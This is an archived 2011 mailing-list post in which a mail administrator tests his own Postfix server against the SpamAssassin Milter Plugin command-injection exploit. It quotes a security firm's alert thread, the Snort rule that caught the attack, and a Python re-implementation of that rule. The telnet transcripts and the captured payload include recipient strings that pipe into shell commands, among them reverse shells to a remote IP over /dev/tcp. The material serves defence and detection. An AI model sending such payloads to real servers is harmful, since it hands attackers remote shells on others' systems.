spamassassin-users mailing list archives

From JKL <ju...@klunky.co.uk>
Subject Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date Thu, 10 Feb 2011 22:10:51 GMT
Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:<root+:"|touch /tmp/foo">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:<root@localhost+:"|touch /tmp/foo">
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:<asdasd@klunky.co.uk>
250 2.1.0 Ok
rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0">
550 5.1.0 <asdasd@klunky.co.uk>: Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.

On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> in case you are using spamassassin milter:
>
> active exploits going on.
>
> <http://seclists.org/fulldisclosure/2010/Mar/140>
> <http://www.securityfocus.com/bid/38578>
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
>
> -------- Original Message --------
> Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
> Personally, I would probably block it.  Although, if we’re not seeing
> this sort of thing pop up on customers’ boxes, a manual block in
> scanner2 is sufficient for now, right?
>
> Either way, let me know and I’ll block/unblock/leave alone.
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
> *From:*Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
> is the snort rule specific enough that you can block the offending ip
> for 5 mins?
>
> (if it's a real smtp server, it will retry) and let legit email through.
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don’t like the looks of this.  I blocked that IP with samtool.
>
> Payload:
>
> rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
>
> data
>
> .
>
> quit
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
> *From:*SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-alert@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
> Plugin Remote Arbitrary Command Injection Attempt
>
> 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
> Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
> -- 
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> ISN: 1259*1300
> >*| *SECNAP Network Security Corporation
>
> ·         Certified SNORT Integrator
>
> ·         2008-9 Hot Company Award Winner, World Executive Alliance
>
> ·         Five-Star Partner Program 2009, VARBusiness
>
> ·         Best in Email Security,2010: Network Products Guide
>
> ·         King of Spam Filters, SC Magazine 2008
>
>

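As an added illustration of how the ET rule quoted in the thread fires (example code written for this archive page, not from the thread, the ET ruleset or Snort), the following Python re-implements the rule's two content matches and runs them over SMTP command lines taken from the telnet transcript plus a few constructed benign ones, which shows that ordinary `+` sub-addressing alone does not trigger it. It assumes each SMTP command line arrives as its own TCP payload, as it does in a typed telnet session.

```python
# Added example: a plain re-implementation of the two content matches in
# ET rule 1:2010877 as quoted in the thread. Not code from the thread,
# the ET ruleset or Snort. Assumes one SMTP command line per TCP payload.


def et_2010877_matches(payload: bytes) -> bool:
    r"""Return True when the payload satisfies both content matches.

    content:"to|3A|"; depth:10; nocase;  -> "to:" must lie entirely within
        the first 10 payload bytes, compared case-insensitively.
    content:"+|3A|\"|7C|";             -> the literal bytes +:"| anywhere
        in the payload (a '+' extension that opens a quoted shell pipe).
    """
    has_to = b"to:" in payload[:10].lower()
    has_pipe = b'+:"|' in payload
    return has_to and has_pipe


def scan_smtp_commands(commands):
    """Return the (index, command) pairs that would fire the rule."""
    return [(i, c) for i, c in enumerate(commands) if et_2010877_matches(c)]


# Entries 0-3 are copied from the telnet transcript in the thread; 4-6 are
# constructed benign commands, including normal '+' sub-addressing.
SAMPLE_COMMANDS = [
    b"MAIL FROM:<asdasd@klunky.co.uk>",
    b'RCPT TO:root+:"|touch /tmp/foo"',
    b'RCPT TO:<root+:"|touch /tmp/foo">',
    b'RCPT TO:<root@localhost+:"|touch /tmp/foo">',
    b"RCPT TO:<user+folder@example.com>",
    b"RCPT TO:<postmaster@example.com>",
    b"DATA",
]

if __name__ == "__main__":
    for idx, cmd in scan_smtp_commands(SAMPLE_COMMANDS):
        print(f"rule would fire on command {idx}: {cmd!r}")
```

Because the second match is not anchored relative to the first, the rule fires on a `RCPT TO:` line regardless of whether Postfix later accepts or rejects the address, which is why the alert appeared even though the test server answered 501.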